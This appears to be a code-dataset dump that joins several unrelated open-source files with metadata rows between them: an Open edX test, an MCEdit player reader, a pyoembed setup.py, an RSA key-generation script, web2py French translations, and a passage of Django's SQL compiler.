class CourseAuthorizationTest(TestCase):
"""Test the CourseAuthorization model."""
@patch.dict(settings.FEATURES, {'REQUIRE_COURSE_EMAIL_AUTH': True})
def test_creation_auth_on(self):
course_id = SlashSeparatedCourseKey('abc', '123', 'doremi')
# Test that course is not authorized by default
self.assertFalse(CourseAuthorization.instructor_email_enabled(course_id))
# Authorize
cauth = CourseAuthorization(course_id=course_id, email_enabled=True)
cauth.save()
# Now, course should be authorized
self.assertTrue(CourseAuthorization.instructor_email_enabled(course_id))
self.assertEquals(
cauth.__unicode__(),
"Course 'abc/123/doremi': Instructor Email Enabled"
)
# Unauthorize by explicitly setting email_enabled to False
cauth.email_enabled = False
cauth.save()
# Test that course is now unauthorized
self.assertFalse(CourseAuthorization.instructor_email_enabled(course_id))
self.assertEquals(
cauth.__unicode__(),
"Course 'abc/123/doremi': Instructor Email Not Enabled"
)
@patch.dict(settings.FEATURES, {'REQUIRE_COURSE_EMAIL_AUTH': False})
def test_creation_auth_off(self):
course_id = SlashSeparatedCourseKey('blahx', 'blah101', 'ehhhhhhh')
# Test that course is authorized by default, since auth is turned off
self.assertTrue(CourseAuthorization.instructor_email_enabled(course_id))
# Use the admin interface to unauthorize the course
cauth = CourseAuthorization(course_id=course_id, email_enabled=False)
cauth.save()
# Now, course should STILL be authorized!
self.assertTrue(CourseAuthorization.instructor_email_enabled(course_id))
| agpl-3.0 | -5,334,411,548,091,353,000 | 41.175141 | 137 | 0.673543 | false |
OniOniOn-/MCEdit-Unified | pymclevel/player.py | 11 | 1697 | import nbt
import version_utils
class Player:
def __init__(self, playerNBTFile):
self.nbtFile = playerNBTFile
self.nbtFileName = playerNBTFile.split("\\")[-1]
self.root_tag = nbt.load(playerNBTFile)
# Properties setup
self._uuid = self.nbtFileName.split(".")[0]
playerName = version_utils.getPlayerNameFromUUID(self._uuid)
if playerName != self._uuid:
self._name = playerName
else:
self._name = None
self._gametype = self.root_tag["playerGameType"].value
self._pos = [self.root_tag["Pos"][0].value, self.root_tag["Pos"][1].value, self.root_tag["Pos"][2].value]
self._rot = [self.root_tag["Rotation"][0].value, self.root_tag["Rotation"][1].value]
self._health = self.root_tag["Health"].value
self._healf = self.root_tag["HealF"].value
self._xp_level = self.root_tag["XpLevel"].value
self._inventory = self.root_tag["Inventory"].value
@property
def name(self):
return self._name
@property
def gametype(self):
return self._gametype
@property
def uuid(self):
return self._uuid
@property
def pos(self):
return self._pos
@property
def rot(self):
return self._rot
@property
def health(self):
return self._health
@property
def healf(self):
return self._healf
@property
def XP_Level(self):
return self._xp_level
@property
def inventory(self):
return self._inventory
def save(self):
raise NotImplementedError("Player Data cannot be saved right now")
| isc | 2,621,828,147,134,761,000 | 24.328358 | 113 | 0.582793 | false |
rafaelmartins/pyoembed | setup.py | 1 | 1114 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
setup.py
~~~~~~~~
:copyright: (c) 2014 by Rafael Goncalves Martins
:license: GPL-2, see LICENSE for more details.
"""
from setuptools import setup, find_packages
import os
cwd = os.path.dirname(os.path.abspath(__file__))
setup(
name='pyoembed',
version='0.1.2',
license='BSD',
description=('A Python library for oEmbed that supports auto-discovered '
'and manually included providers.'),
long_description=open(os.path.join(cwd, 'README.rst')).read(),
author='Rafael Goncalves Martins',
author_email='[email protected]',
platforms='any',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
install_requires=[
'requests',
'beautifulsoup4',
'lxml',
],
classifiers=[
'Development Status :: 3 - Alpha',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
],
test_suite='pyoembed.tests',
tests_require=['mock'],
)
| bsd-3-clause | -6,753,817,959,143,042,000 | 24.906977 | 77 | 0.60772 | false |
thanatos/crypto-tools | crypto_tools/generate_private_key.py | 1 | 3190 | """Generate a private key."""
import argparse
import getpass
import sys
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
# Two good sources for this:
# First, the crpyto SE:
# http://crypto.stackexchange.com/questions/1978/how-big-an-rsa-key-is-considered-secure-today
# this source helpfully includes a graph of known factorizations. There's a
# decent trendline on the graph. It's unfortunately outdated, but if the trend
# held then 1024 bit keys were factored in ~2016, which is in the past.
#
# 512-bit (**THE DEFAULT KEY SIZE IN OPENSSL**) has already been factored. This
# is this script's raison d'être.
#
# Another good source:
# https://en.wikipedia.org/wiki/RSA_Factoring_Challenge#The_prizes_and_records
# This has some for-fun factor prizes; the highest prize claimed was for a 768
# bit key. The challenge has since been withdraw, so it is unknown if further
# prizes would have been claimed.
_MINIMUM_ALLOWED_KEY_SIZE = 2048
def main():
parser = argparse.ArgumentParser(
description=(
'Generate a new RSA private key. Output the resulting key in PEM'
' form to stdout.'
)
)
parser.add_argument(
'--key-length',
action='store',
default=2048,
type=int,
help='The length of the private key, in bits.',
)
parser.add_argument(
'--do-not-encrypt',
action='store_false',
dest='encrypt',
default='true',
help=(
'Don\'t encrpyt the resulting *PRIVATE* key material. The result'
' is sensitive: if you leak the private key, it\'s all over.'
),
)
pargs = parser.parse_args()
if pargs.key_length < _MINIMUM_ALLOWED_KEY_SIZE:
print(
'The specified key length {} is too small, and considered'
' insecure by this script. Specify a key length of at least {}'
' bits.'.format(
pargs.key_length, _MINIMUM_ALLOWED_KEY_SIZE,
),
file=sys.stderr,
)
sys.exit(1)
if pargs.encrypt:
password = getpass.getpass()
else:
password = None
generate_rsa_key(sys.stdout, pargs.key_length, password)
def generate_rsa_key(output_file, length_in_bits, password):
"""Generate a new RSA private key."""
# We take the library's advice here: "If in doubt you should use 65537."
# (https://cryptography.io/en/latest/hazmat/primitives/asymmetric/rsa/)
public_exponent = 65537
private_key = rsa.generate_private_key(
public_exponent,
length_in_bits,
backend=default_backend(),
)
if password is None:
encryption = serialization.NoEncryption()
else:
encryption = serialization.BestAvailableEncryption(
password.encode('utf-8')
)
key_material = private_key.private_bytes(
serialization.Encoding.PEM,
serialization.PrivateFormat.PKCS8,
encryption,
)
output_file.write(key_material.decode('ascii'))
if __name__ == '__main__':
main()
| mit | -6,496,813,991,280,293,000 | 29.084906 | 96 | 0.643775 | false |
zvolsky/codex2020 | languages/fr.py | 1 | 9162 | # -*- coding: utf-8 -*-
{
'!langcode!': 'fr',
'!langname!': 'Français',
'"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"update" est une expression optionnelle comme "champ1=\'nouvellevaleur\'". Vous ne pouvez mettre à jour ou supprimer les résultats d\'un JOIN',
'%s %%{row} deleted': '%s lignes supprimées',
'%s %%{row} updated': '%s lignes mises à jour',
'%s selected': '%s sélectionné',
'%Y-%m-%d': '%Y-%m-%d',
'%Y-%m-%d %H:%M:%S': '%Y-%m-%d %H:%M:%S',
'?': '?',
'About': 'À propos',
'Access Control': "Contrôle d'accès",
'admin': 'admin',
'Administrative Interface': "Interface d'administration",
'Administrative interface': "Interface d'administration",
'Ajax Recipes': 'Recettes Ajax',
'appadmin is disabled because insecure channel': "appadmin est désactivée parce que le canal n'est pas sécurisé",
'Are you sure you want to delete this object?': 'Êtes-vous sûr de vouloir supprimer cet objet?',
'Authentication': 'Authentification',
'Available Databases and Tables': 'Bases de données et tables disponibles',
'Barcode EAN': 'Barcode EAN',
'barcode printed in the publication': 'barcode printed in the publication',
'Buy this book': 'Acheter ce livre',
"Buy web2py's book": "Buy web2py's book",
'cache': 'cache',
'Cache': 'Cache',
'Cache Cleared': 'Cache Cleared',
'Cache Keys': 'Clés de cache',
'Cannot be empty': 'Ne peut pas être vide',
'change password': 'changer le mot de passe',
'Check to delete': 'Cliquez pour supprimer',
'Check to delete:': 'Cliquez pour supprimer:',
'Clear CACHE?': 'Vider le CACHE?',
'Clear DISK': 'Vider le DISQUE',
'Clear RAM': 'Vider la RAM',
'Client IP': 'IP client',
'Community': 'Communauté',
'Components and Plugins': 'Composants et Plugins',
'Config.ini': 'Config.ini',
'Controller': 'Contrôleur',
'Copyright': 'Copyright',
'Created By': 'Créé par',
'Created On': 'Créé le',
'Current request': 'Demande actuelle',
'Current response': 'Réponse actuelle',
'Current session': 'Session en cours',
'customize me!': 'personnalisez-moi!',
'data uploaded': 'données téléchargées',
'Database': 'base de données',
'Database %s select': 'base de données %s selectionnée',
'Database Administration (appadmin)': 'Database Administration (appadmin)',
'db': 'bdd',
'DB Model': 'Modèle BDD',
'Delete:': 'Supprimer:',
'Demo': 'Démo',
'Deployment Recipes': 'Recettes de déploiement',
'Description': 'Description',
'design': 'design',
'Design': 'Design',
'DISK': 'DISQUE',
'Disk Cache Keys': 'Clés de cache du disque',
'Disk Cleared': 'Disque vidé',
'Documentation': 'Documentation',
"Don't know what to do?": 'Vous ne savez pas quoi faire?',
'done!': 'fait!',
'Download': 'Téléchargement',
'E-mail': 'E-mail',
'Edit': 'Éditer',
'Edit current record': "Modifier l'enregistrement courant",
'edit profile': 'modifier le profil',
'Edit This App': 'Modifier cette application',
'Email and SMS': 'Email et SMS',
'enter an integer between %(min)g and %(max)g': 'entrez un entier entre %(min)g et %(max)g',
'Errors': 'Erreurs',
'export as csv file': 'exporter sous forme de fichier csv',
'FAQ': 'FAQ',
'Find by': 'Find by',
'First name': 'Prénom',
'Forms and Validators': 'Formulaires et Validateurs',
'Free Applications': 'Applications gratuites',
'Function disabled': 'Fonction désactivée',
'Graph Model': 'Graph Model',
'Group ID': 'Groupe ID',
'Groups': 'Groupes',
'Hello World': 'Bonjour le monde',
'Helping web2py': 'Helping web2py',
'Home': 'Accueil',
'How did you get here?': 'Comment êtes-vous arrivé ici?',
'import': 'import',
'Import/Export': 'Importer/Exporter',
'Index': 'Index',
'insert new': 'insérer un nouveau',
'insert new %s': 'insérer un nouveau %s',
'Internal State': 'État interne',
'Introduction': 'Introduction',
'Invalid email': 'E-mail invalide',
'Invalid Query': 'Requête Invalide',
'invalid request': 'requête invalide',
'Is Active': 'Est actif',
'Key': 'Clé',
'Last name': 'Nom',
'Layout': 'Mise en page',
'Layout Plugins': 'Plugins de mise en page',
'Layouts': 'Mises en page',
'Live chat': 'Chat en direct',
'Live Chat': 'Chat en direct',
'Log In': 'Log In',
'login': 'connectez-vous',
'Login': 'Connectez-vous',
'logout': 'déconnectez-vous',
'lost password': 'mot de passe perdu',
'Lost Password': 'Mot de passe perdu',
'Lost password?': 'Mot de passe perdu?',
'lost password?': 'mot de passe perdu?',
'Main Menu': 'Menu principal',
'main title of the publication': 'main title of the publication',
'Manage %(action)s': 'Manage %(action)s',
'Manage Access Control': 'Manage Access Control',
'Manage Cache': 'Gérer le Cache',
'Memberships': 'Memberships',
'Menu Model': 'Menu modèle',
'Modified By': 'Modifié par',
'Modified On': 'Modifié le',
'My Sites': 'Mes sites',
'Name': 'Nom',
'New Record': 'Nouvel enregistrement',
'new record inserted': 'nouvel enregistrement inséré',
'next %s rows': 'next %s rows',
'next 100 rows': '100 prochaines lignes',
'No databases in this application': "Cette application n'a pas de bases de données",
'Object or table name': 'Objet ou nom de table',
'Online book': 'Online book',
'Online examples': 'Exemples en ligne',
'or import from csv file': "ou importer d'un fichier CSV",
'Origin': 'Origine',
'Other Plugins': 'Autres Plugins',
'Other Recipes': 'Autres recettes',
'Overview': 'Présentation',
'Password': 'Mot de passe',
"Password fields don't match": 'Les mots de passe ne correspondent pas',
'Permission': 'Permission',
'Permissions': 'Permissions',
'Plugins': 'Plugins',
'Powered by': 'Alimenté par',
'Preface': 'Préface',
'previous %s rows': 'previous %s rows',
'previous 100 rows': '100 lignes précédentes',
'pygraphviz library not found': 'pygraphviz library not found',
'Python': 'Python',
'Query:': 'Requête:',
'Quick Examples': 'Exemples Rapides',
'RAM': 'RAM',
'RAM Cache Keys': 'Clés de cache de la RAM',
'Ram Cleared': 'Ram vidée',
'Readme': 'Lisez-moi',
'Recipes': 'Recettes',
'Record': 'enregistrement',
'record does not exist': "l'archive n'existe pas",
'Record ID': "ID d'enregistrement",
'Record id': "id d'enregistrement",
'Register': "S'inscrire",
'register': "s'inscrire",
'Registration identifier': "Identifiant d'enregistrement",
'Registration key': "Clé d'enregistrement",
'Remember me (for 30 days)': 'Se souvenir de moi (pendant 30 jours)',
'Request reset password': 'Demande de réinitialiser le mot clé',
'Reset Password key': 'Réinitialiser le mot clé',
'Resources': 'Ressources',
'Role': 'Rôle',
'Roles': 'Roles',
'Rows in Table': 'Lignes du tableau',
'Rows selected': 'Lignes sélectionnées',
'Save model as...': 'Save model as...',
'Semantic': 'Sémantique',
'Services': 'Services',
'Sign Up': 'Sign Up',
'Size of cache:': 'Taille du cache:',
'starting characters of title to find the publication offline or online': 'starting characters of title to find the publication offline or online',
'state': 'état',
'Statistics': 'Statistiques',
'Stylesheet': 'Feuille de style',
'submit': 'soumettre',
'Submit': 'Soumettre',
'Support': 'Support',
'Sure you want to delete this object?': 'Êtes-vous sûr de vouloir supprimer cet objet?',
'Table': 'tableau',
'Table name': 'Nom du tableau',
'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.': 'La "requête" est une condition comme "db.table1.champ1==\'valeur\'". Quelque chose comme "db.table1.champ1==db.table2.champ2" résulte en un JOIN SQL.',
'The Core': 'Le noyau',
'The output of the file is a dictionary that was rendered by the view %s': 'La sortie de ce fichier est un dictionnaire qui été restitué par la vue %s',
'The Views': 'Les Vues',
'This App': 'Cette Appli',
'This is a copy of the scaffolding application': "Ceci est une copie de l'application échafaudage",
'Time in Cache (h:m:s)': 'Temps en Cache (h:m:s)',
'Timestamp': 'Horodatage',
'Title': 'Title',
'Traceback': 'Traceback',
'Try find by': 'Try find by',
'Twitter': 'Twitter',
'unable to parse csv file': "incapable d'analyser le fichier cvs",
'Update:': 'Mise à jour:',
'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': 'Employez (...)&(...) pour AND, (...)|(...) pour OR, and ~(...) pour NOT afin de construire des requêtes plus complexes.',
'User': 'User',
'User %(id)s Logged-in': 'Utilisateur %(id)s connecté',
'User %(id)s Registered': 'Utilisateur %(id)s enregistré',
'User ID': 'ID utilisateur',
'User Voice': "Voix de l'utilisateur",
'Users': 'Users',
'Verify Password': 'Vérifiez le mot de passe',
'Videos': 'Vidéos',
'View': 'Présentation',
'Web2py': 'Web2py',
'Welcome': 'Bienvenue',
'Welcome %s': 'Bienvenue %s',
'Welcome to web2py': 'Bienvenue à web2py',
'Welcome to web2py!': 'Bienvenue à web2py!',
'Which called the function %s located in the file %s': 'Qui a appelé la fonction %s se trouvant dans le fichier %s',
'Working...': 'Working...',
'You are successfully running web2py': 'Vous exécutez avec succès web2py',
'You can modify this application and adapt it to your needs': "Vous pouvez modifier cette application et l'adapter à vos besoins",
'You visited the url %s': "Vous avez visité l'URL %s",
}
| agpl-3.0 | -1,561,224,637,631,581,700 | 39.636771 | 293 | 0.687817 | false |
pombredanne/algos-urv | django/db/models/sql/compiler.py | 9 | 44075 | from django.core.exceptions import FieldError
from django.db import connections
from django.db.backends.util import truncate_name
from django.db.models.sql.constants import *
from django.db.models.sql.datastructures import EmptyResultSet
from django.db.models.sql.expressions import SQLEvaluator
from django.db.models.sql.query import get_proxied_model, get_order_dir, \
select_related_descend, Query
class SQLCompiler(object):
def __init__(self, query, connection, using):
self.query = query
self.connection = connection
self.using = using
self.quote_cache = {}
def pre_sql_setup(self):
"""
Does any necessary class setup immediately prior to producing SQL. This
is for things that can't necessarily be done in __init__ because we
might not have all the pieces in place at that time.
"""
if not self.query.tables:
self.query.join((None, self.query.model._meta.db_table, None, None))
if (not self.query.select and self.query.default_cols and not
self.query.included_inherited_models):
self.query.setup_inherited_models()
if self.query.select_related and not self.query.related_select_cols:
self.fill_related_selections()
def quote_name_unless_alias(self, name):
"""
A wrapper around connection.ops.quote_name that doesn't quote aliases
for table names. This avoids problems with some SQL dialects that treat
quoted strings specially (e.g. PostgreSQL).
"""
if name in self.quote_cache:
return self.quote_cache[name]
if ((name in self.query.alias_map and name not in self.query.table_map) or
name in self.query.extra_select):
self.quote_cache[name] = name
return name
r = self.connection.ops.quote_name(name)
self.quote_cache[name] = r
return r
def as_sql(self, with_limits=True, with_col_aliases=False):
"""
Creates the SQL for this query. Returns the SQL string and list of
parameters.
If 'with_limits' is False, any limit/offset information is not included
in the query.
"""
if with_limits and self.query.low_mark == self.query.high_mark:
return '', ()
self.pre_sql_setup()
out_cols = self.get_columns(with_col_aliases)
ordering, ordering_group_by = self.get_ordering()
# This must come after 'select' and 'ordering' -- see docstring of
# get_from_clause() for details.
from_, f_params = self.get_from_clause()
qn = self.quote_name_unless_alias
where, w_params = self.query.where.as_sql(qn=qn, connection=self.connection)
having, h_params = self.query.having.as_sql(qn=qn, connection=self.connection)
params = []
for val in self.query.extra_select.itervalues():
params.extend(val[1])
result = ['SELECT']
if self.query.distinct:
result.append('DISTINCT')
result.append(', '.join(out_cols + self.query.ordering_aliases))
result.append('FROM')
result.extend(from_)
params.extend(f_params)
if where:
result.append('WHERE %s' % where)
params.extend(w_params)
grouping, gb_params = self.get_grouping()
if grouping:
if ordering:
# If the backend can't group by PK (i.e., any database
# other than MySQL), then any fields mentioned in the
# ordering clause needs to be in the group by clause.
if not self.connection.features.allows_group_by_pk:
for col, col_params in ordering_group_by:
if col not in grouping:
grouping.append(str(col))
gb_params.extend(col_params)
else:
ordering = self.connection.ops.force_no_ordering()
result.append('GROUP BY %s' % ', '.join(grouping))
params.extend(gb_params)
if having:
result.append('HAVING %s' % having)
params.extend(h_params)
if ordering:
result.append('ORDER BY %s' % ', '.join(ordering))
if with_limits:
if self.query.high_mark is not None:
result.append('LIMIT %d' % (self.query.high_mark - self.query.low_mark))
if self.query.low_mark:
if self.query.high_mark is None:
val = self.connection.ops.no_limit_value()
if val:
result.append('LIMIT %d' % val)
result.append('OFFSET %d' % self.query.low_mark)
return ' '.join(result), tuple(params)
def as_nested_sql(self):
"""
Perform the same functionality as the as_sql() method, returning an
SQL string and parameters. However, the alias prefixes are bumped
beforehand (in a copy -- the current query isn't changed), and any
ordering is removed if the query is unsliced.
Used when nesting this query inside another.
"""
obj = self.query.clone()
if obj.low_mark == 0 and obj.high_mark is None:
# If there is no slicing in use, then we can safely drop all ordering
obj.clear_ordering(True)
obj.bump_prefix()
return obj.get_compiler(connection=self.connection).as_sql()
def get_columns(self, with_aliases=False):
"""
Returns the list of columns to use in the select statement. If no
columns have been specified, returns all columns relating to fields in
the model.
If 'with_aliases' is true, any column names that are duplicated
(without the table names) are given unique aliases. This is needed in
some cases to avoid ambiguity with nested queries.
"""
qn = self.quote_name_unless_alias
qn2 = self.connection.ops.quote_name
result = ['(%s) AS %s' % (col[0], qn2(alias)) for alias, col in self.query.extra_select.iteritems()]
aliases = set(self.query.extra_select.keys())
if with_aliases:
col_aliases = aliases.copy()
else:
col_aliases = set()
if self.query.select:
only_load = self.deferred_to_columns()
for col in self.query.select:
if isinstance(col, (list, tuple)):
alias, column = col
table = self.query.alias_map[alias][TABLE_NAME]
if table in only_load and col not in only_load[table]:
continue
r = '%s.%s' % (qn(alias), qn(column))
if with_aliases:
if col[1] in col_aliases:
c_alias = 'Col%d' % len(col_aliases)
result.append('%s AS %s' % (r, c_alias))
aliases.add(c_alias)
col_aliases.add(c_alias)
else:
result.append('%s AS %s' % (r, qn2(col[1])))
aliases.add(r)
col_aliases.add(col[1])
else:
result.append(r)
aliases.add(r)
col_aliases.add(col[1])
else:
result.append(col.as_sql(qn, self.connection))
if hasattr(col, 'alias'):
aliases.add(col.alias)
col_aliases.add(col.alias)
elif self.query.default_cols:
cols, new_aliases = self.get_default_columns(with_aliases,
col_aliases)
result.extend(cols)
aliases.update(new_aliases)
max_name_length = self.connection.ops.max_name_length()
result.extend([
'%s%s' % (
aggregate.as_sql(qn, self.connection),
alias is not None
and ' AS %s' % qn(truncate_name(alias, max_name_length))
or ''
)
for alias, aggregate in self.query.aggregate_select.items()
])
for table, col in self.query.related_select_cols:
r = '%s.%s' % (qn(table), qn(col))
if with_aliases and col in col_aliases:
c_alias = 'Col%d' % len(col_aliases)
result.append('%s AS %s' % (r, c_alias))
aliases.add(c_alias)
col_aliases.add(c_alias)
else:
result.append(r)
aliases.add(r)
col_aliases.add(col)
self._select_aliases = aliases
return result
def get_default_columns(self, with_aliases=False, col_aliases=None,
start_alias=None, opts=None, as_pairs=False, local_only=False):
"""
Computes the default columns for selecting every field in the base
model. Will sometimes be called to pull in related models (e.g. via
select_related), in which case "opts" and "start_alias" will be given
to provide a starting point for the traversal.
Returns a list of strings, quoted appropriately for use in SQL
directly, as well as a set of aliases used in the select statement (if
'as_pairs' is True, returns a list of (alias, col_name) pairs instead
of strings as the first component and None as the second component).
"""
result = []
if opts is None:
opts = self.query.model._meta
qn = self.quote_name_unless_alias
qn2 = self.connection.ops.quote_name
aliases = set()
only_load = self.deferred_to_columns()
# Skip all proxy to the root proxied model
proxied_model = get_proxied_model(opts)
if start_alias:
seen = {None: start_alias}
for field, model in opts.get_fields_with_model():
if local_only and model is not None:
continue
if start_alias:
try:
alias = seen[model]
except KeyError:
if model is proxied_model:
alias = start_alias
else:
link_field = opts.get_ancestor_link(model)
alias = self.query.join((start_alias, model._meta.db_table,
link_field.column, model._meta.pk.column))
seen[model] = alias
else:
# If we're starting from the base model of the queryset, the
# aliases will have already been set up in pre_sql_setup(), so
# we can save time here.
alias = self.query.included_inherited_models[model]
table = self.query.alias_map[alias][TABLE_NAME]
if table in only_load and field.column not in only_load[table]:
continue
if as_pairs:
result.append((alias, field.column))
aliases.add(alias)
continue
if with_aliases and field.column in col_aliases:
c_alias = 'Col%d' % len(col_aliases)
result.append('%s.%s AS %s' % (qn(alias),
qn2(field.column), c_alias))
col_aliases.add(c_alias)
aliases.add(c_alias)
else:
r = '%s.%s' % (qn(alias), qn2(field.column))
result.append(r)
aliases.add(r)
if with_aliases:
col_aliases.add(field.column)
return result, aliases
def get_ordering(self):
"""
Returns a tuple containing a list representing the SQL elements in the
"order by" clause, and the list of SQL elements that need to be added
to the GROUP BY clause as a result of the ordering.
Also sets the ordering_aliases attribute on this instance to a list of
extra aliases needed in the select.
Determining the ordering SQL can change the tables we need to include,
so this should be run *before* get_from_clause().
"""
if self.query.extra_order_by:
ordering = self.query.extra_order_by
elif not self.query.default_ordering:
ordering = self.query.order_by
else:
ordering = self.query.order_by or self.query.model._meta.ordering
qn = self.quote_name_unless_alias
qn2 = self.connection.ops.quote_name
distinct = self.query.distinct
select_aliases = self._select_aliases
result = []
group_by = []
ordering_aliases = []
if self.query.standard_ordering:
asc, desc = ORDER_DIR['ASC']
else:
asc, desc = ORDER_DIR['DESC']
# It's possible, due to model inheritance, that normal usage might try
# to include the same field more than once in the ordering. We track
# the table/column pairs we use and discard any after the first use.
processed_pairs = set()
for field in ordering:
if field == '?':
result.append(self.connection.ops.random_function_sql())
continue
if isinstance(field, int):
if field < 0:
order = desc
field = -field
else:
order = asc
result.append('%s %s' % (field, order))
group_by.append((field, []))
continue
col, order = get_order_dir(field, asc)
if col in self.query.aggregate_select:
result.append('%s %s' % (col, order))
continue
if '.' in field:
# This came in through an extra(order_by=...) addition. Pass it
# on verbatim.
table, col = col.split('.', 1)
if (table, col) not in processed_pairs:
elt = '%s.%s' % (qn(table), col)
processed_pairs.add((table, col))
if not distinct or elt in select_aliases:
result.append('%s %s' % (elt, order))
group_by.append((elt, []))
elif get_order_dir(field)[0] not in self.query.extra_select:
# 'col' is of the form 'field' or 'field1__field2' or
# '-field1__field2__field', etc.
for table, col, order in self.find_ordering_name(field,
self.query.model._meta, default_order=asc):
if (table, col) not in processed_pairs:
elt = '%s.%s' % (qn(table), qn2(col))
processed_pairs.add((table, col))
if distinct and elt not in select_aliases:
ordering_aliases.append(elt)
result.append('%s %s' % (elt, order))
group_by.append((elt, []))
else:
elt = qn2(col)
if distinct and col not in select_aliases:
ordering_aliases.append(elt)
result.append('%s %s' % (elt, order))
group_by.append(self.query.extra_select[col])
self.query.ordering_aliases = ordering_aliases
return result, group_by
def find_ordering_name(self, name, opts, alias=None, default_order='ASC',
already_seen=None):
"""
Returns the table alias (the name might be ambiguous, the alias will
not be) and column name for ordering by the given 'name' parameter.
The 'name' is of the form 'field1__field2__...__fieldN'.
"""
name, order = get_order_dir(name, default_order)
pieces = name.split(LOOKUP_SEP)
if not alias:
alias = self.query.get_initial_alias()
field, target, opts, joins, last, extra = self.query.setup_joins(pieces,
opts, alias, False)
alias = joins[-1]
col = target.column
if not field.rel:
# To avoid inadvertent trimming of a necessary alias, use the
# refcount to show that we are referencing a non-relation field on
# the model.
self.query.ref_alias(alias)
# Must use left outer joins for nullable fields and their relations.
self.query.promote_alias_chain(joins,
self.query.alias_map[joins[0]][JOIN_TYPE] == self.query.LOUTER)
# If we get to this point and the field is a relation to another model,
# append the default ordering for that model.
if field.rel and len(joins) > 1 and opts.ordering:
# Firstly, avoid infinite loops.
if not already_seen:
already_seen = set()
join_tuple = tuple([self.query.alias_map[j][TABLE_NAME] for j in joins])
if join_tuple in already_seen:
raise FieldError('Infinite loop caused by ordering.')
already_seen.add(join_tuple)
results = []
for item in opts.ordering:
results.extend(self.find_ordering_name(item, opts, alias,
order, already_seen))
return results
if alias:
# We have to do the same "final join" optimisation as in
# add_filter, since the final column might not otherwise be part of
# the select set (so we can't order on it).
while 1:
join = self.query.alias_map[alias]
if col != join[RHS_JOIN_COL]:
break
self.query.unref_alias(alias)
alias = join[LHS_ALIAS]
col = join[LHS_JOIN_COL]
return [(alias, col, order)]
def get_from_clause(self):
"""
Returns a list of strings that are joined together to go after the
"FROM" part of the query, as well as a list any extra parameters that
need to be included. Sub-classes, can override this to create a
from-clause via a "select".
This should only be called after any SQL construction methods that
might change the tables we need. This means the select columns and
ordering must be done first.
"""
result = []
qn = self.quote_name_unless_alias
qn2 = self.connection.ops.quote_name
first = True
for alias in self.query.tables:
if not self.query.alias_refcount[alias]:
continue
try:
name, alias, join_type, lhs, lhs_col, col, nullable = self.query.alias_map[alias]
except KeyError:
# Extra tables can end up in self.tables, but not in the
# alias_map if they aren't in a join. That's OK. We skip them.
continue
alias_str = (alias != name and ' %s' % alias or '')
if join_type and not first:
result.append('%s %s%s ON (%s.%s = %s.%s)'
% (join_type, qn(name), alias_str, qn(lhs),
qn2(lhs_col), qn(alias), qn2(col)))
else:
connector = not first and ', ' or ''
result.append('%s%s%s' % (connector, qn(name), alias_str))
first = False
for t in self.query.extra_tables:
alias, unused = self.query.table_alias(t)
# Only add the alias if it's not already present (the table_alias()
# calls increments the refcount, so an alias refcount of one means
# this is the only reference.
if alias not in self.query.alias_map or self.query.alias_refcount[alias] == 1:
connector = not first and ', ' or ''
result.append('%s%s' % (connector, qn(alias)))
first = False
return result, []
def get_grouping(self):
"""
Returns a tuple representing the SQL elements in the "group by" clause.
"""
qn = self.quote_name_unless_alias
result, params = [], []
if self.query.group_by is not None:
if len(self.query.model._meta.fields) == len(self.query.select) and \
self.connection.features.allows_group_by_pk:
self.query.group_by = [(self.query.model._meta.db_table, self.query.model._meta.pk.column)]
group_by = self.query.group_by or []
extra_selects = []
for extra_select, extra_params in self.query.extra_select.itervalues():
extra_selects.append(extra_select)
params.extend(extra_params)
for col in group_by + self.query.related_select_cols + extra_selects:
if isinstance(col, (list, tuple)):
result.append('%s.%s' % (qn(col[0]), qn(col[1])))
elif hasattr(col, 'as_sql'):
result.append(col.as_sql(qn))
else:
result.append('(%s)' % str(col))
return result, params
def fill_related_selections(self, opts=None, root_alias=None, cur_depth=1,
used=None, requested=None, restricted=None, nullable=None,
dupe_set=None, avoid_set=None):
"""
Fill in the information needed for a select_related query. The current
depth is measured as the number of connections away from the root model
(for example, cur_depth=1 means we are looking at models with direct
connections to the root model).
"""
if not restricted and self.query.max_depth and cur_depth > self.query.max_depth:
# We've recursed far enough; bail out.
return
if not opts:
opts = self.query.get_meta()
root_alias = self.query.get_initial_alias()
self.query.related_select_cols = []
self.query.related_select_fields = []
if not used:
used = set()
if dupe_set is None:
dupe_set = set()
if avoid_set is None:
avoid_set = set()
orig_dupe_set = dupe_set
# Setup for the case when only particular related fields should be
# included in the related selection.
if requested is None:
if isinstance(self.query.select_related, dict):
requested = self.query.select_related
restricted = True
else:
restricted = False
for f, model in opts.get_fields_with_model():
if not select_related_descend(f, restricted, requested):
continue
# The "avoid" set is aliases we want to avoid just for this
# particular branch of the recursion. They aren't permanently
# forbidden from reuse in the related selection tables (which is
# what "used" specifies).
avoid = avoid_set.copy()
dupe_set = orig_dupe_set.copy()
table = f.rel.to._meta.db_table
promote = nullable or f.null
if model:
int_opts = opts
alias = root_alias
alias_chain = []
for int_model in opts.get_base_chain(model):
# Proxy model have elements in base chain
# with no parents, assign the new options
# object and skip to the next base in that
# case
if not int_opts.parents[int_model]:
int_opts = int_model._meta
continue
lhs_col = int_opts.parents[int_model].column
dedupe = lhs_col in opts.duplicate_targets
if dedupe:
avoid.update(self.query.dupe_avoidance.get((id(opts), lhs_col),
()))
dupe_set.add((opts, lhs_col))
int_opts = int_model._meta
alias = self.query.join((alias, int_opts.db_table, lhs_col,
int_opts.pk.column), exclusions=used,
promote=promote)
alias_chain.append(alias)
for (dupe_opts, dupe_col) in dupe_set:
self.query.update_dupe_avoidance(dupe_opts, dupe_col, alias)
if self.query.alias_map[root_alias][JOIN_TYPE] == self.query.LOUTER:
self.query.promote_alias_chain(alias_chain, True)
else:
alias = root_alias
dedupe = f.column in opts.duplicate_targets
if dupe_set or dedupe:
avoid.update(self.query.dupe_avoidance.get((id(opts), f.column), ()))
if dedupe:
dupe_set.add((opts, f.column))
alias = self.query.join((alias, table, f.column,
f.rel.get_related_field().column),
exclusions=used.union(avoid), promote=promote)
used.add(alias)
